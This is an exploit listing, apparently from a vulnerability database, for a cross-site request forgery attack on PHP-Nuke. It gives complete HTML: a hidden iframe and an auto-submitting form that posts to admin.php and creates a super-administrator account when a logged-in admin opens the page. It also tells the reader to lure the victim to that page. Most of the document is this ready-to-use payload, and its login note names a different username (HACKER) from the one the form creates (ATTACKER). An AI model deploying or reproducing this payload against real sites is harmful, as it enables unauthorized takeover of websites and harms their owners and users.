PHP-Nuke add admin ALL Versions

2007-09-2100:00:00

vulners.com

JSON

Paste this code into an HTML page then link it to victim (victim must be admin)

    &lt;iframe name=&quot;aiuto&quot; frameborder=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot;&gt;&lt;/iframe&gt;
    &lt;FORM name=&quot;Faiuto&quot; ACTION=&quot;http://VICTIMURL/nuke/admin.php&quot; target=&quot;aiuto&quot; METHOD=POST&gt;
    &lt;input type=hidden NAME=&quot;add_name&quot; value=&quot;ATTACKER&quot;&gt;
    &lt;input type=hidden NAME=&quot;add_aid&quot; value=&quot;ATTACKER&quot;&gt;
    &lt;input type=hidden NAME=&quot;add_email&quot; value=&quot;[email protected]&quot;&gt;
    &lt;input type=hidden NAME=&quot;add_url&quot; value=&quot;YOURSITE&quot;&gt;
    &lt;input type=hidden NAME=&quot;add_admlanguage&quot; value=&quot;italian&quot;&gt;
    &lt;input type=hidden NAME=&quot;add_radminsuper&quot; value=&quot;1&quot;&gt;
    &lt;input type=hidden NAME=&quot;add_pwd&quot; value=&quot;YOURPASSWORD&quot;&gt;
    &lt;input type=hidden NAME=&quot;op&quot; value=&quot;AddAuthor&quot;&gt;
    &lt;input type=&quot;image&quot; height=&quot;0&quot; width=&quot;0&quot;&gt;
    &lt;/FORM&gt;&lt;SCRIPT&gt;document.Faiuto.submit&#40;&#41;&lt;/SCRIPT&gt;

You are admin now ;)

Then you can log in into phpnuke with user HACKER and pass YOURPASSWORD…

JSON